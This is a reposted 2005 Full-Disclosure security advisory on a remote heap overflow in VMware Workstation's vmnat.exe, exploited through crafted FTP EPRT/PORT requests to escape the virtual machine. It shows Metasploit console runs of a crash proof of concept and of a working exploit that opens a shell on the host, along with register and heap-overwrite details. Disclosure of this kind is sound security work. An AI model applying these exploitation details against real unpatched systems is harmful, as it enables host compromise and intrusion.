VMWare Workstation 5.5.0 <= build-18007 G SX Server Variants And Others

2005-12-21 / 2005-12-22
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Requested by the author. ----- Forwarded message from Security Advisories <Security-Advisories (at) acs-inc (dot) com [email concealed]> ----- From: Security Advisories <Security-Advisories (at) acs-inc (dot) com [email concealed]> To: bugtraq (at) securityfocus (dot) com [email concealed], vulnwatch (at) vulnwatch (dot) org [email concealed], full-disclosure (at) lists.grok.org (dot) uk [email concealed] Subject: [Full-disclosure] [ACSSEC-2005-11-25-0x1] VMWare Workstation 5.5.0 <= build-18007 G SX Server Variants And Others -=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=- ACS Security Assessment Advisory - Remote Heap Overflow ID: ACSSEC-2005-11-25 - 0x1 Class: Remote Heap Overflow Package: VMWare Workstation 5.5.0 <= build-18007 VMWare GSX Server Variants VMWare Ace Variants VMWare Player Variants Exempt: VMWare ESX Server Variants Build: Windows NT/2k/XP/2k3 Notified: Dec 01, 2005 Released: Dec 21, 2005 Remote: Yes Severity: High Credit: Tim Shelton <security-advisories (at) acs-inc (dot) com [email concealed]> -=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=- -=[ Background "VMware Workstation is powerful desktop virtualization software for software developers/testers and enterprise IT professionals that runs multiple operating systems simultaneously on a single PC. Users can run Windows, Linux, NetWare, or Solaris x86 in fully networked, portable virtual machines - no rebooting or hard drive partitioning required. VMware Workstation delivers excellent performance and advanced features such as memory optimization and the ability to manage multi-tier configurations and multiple snapshots. With millions of customers and dozens of major product awards over the last six years, VMware Workstation is a proven technology that improves productivity and flexibility. An indispensable tool for software developers and IT professionals worldwide." -- http://www.vmware.com/products/ws/ -=[ Technical Description A vulnerability was identified in VMware Workstation (And others) vmnat.exe, which could be exploited by remote attackers to execute arbitrary commands. This vulnerability allows the escape from a VMware Virtual Machine into userland space and compromising the host. 'Vmnat' is unable to process specially crafted 'EPRT' and 'PORT' FTP Requests. -=[ Proof of Concept: -=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=- msf > use vmware_vmnat msf vmware_vmnat(win32_bind) > exploit [*] Starting Bind Handler. [*] VMWare vmnat Remote Heap Exploit by Tim Shelton <security (at) acs-inc (dot) com [email concealed]> [*] 220 #### FTP Server Ready. [*] Login as anonymous/login [*] Sending evil buffer.... [*] No response from FTP server [*] Exiting Bind Handler. vmnat.exe: Access violation when writing to [2F5C2F5C] <- Controllable Registers -=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=- -=[ Breakdown Control over registers ECX, EDI, EBX will allow you overwrite an available Heap Header PLINK and FLINK. EDX points to your buffer on overwrite. Overwrite located at ntdll.0x7C926A36 Windows XP/SP2 build 2600 -=[ Functioning Overflow of Concept: -=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=- msf > use vmware_vmnat_0day msf vmware_vmnat_0day(win32_bind) > exploit [*] Starting Bind Handler. [*] VMWare vmnat Remote Heap Exploit 0day by Tim Shelton <security (at) acs-inc (dot) com [email concealed]> [*] 220 #### FTP Server Ready. [*] Login as anonymous/login [*] Sending evil buffer.... [*] Got connection from 192.168.79.130:34941 <-> 192.168.79.2:4444 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:Program FilesVMware Workstation> -=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=- -=[ Credits Vulnerability originally reported and exploited by Tim Shelton -=[ ChangeLog 2005-11-25 : Original Advisory 2005-12-01 : Notified Vendor 2005-12-20 : Vendor released patch, disclosing full information. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ----- End forwarded message -----


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top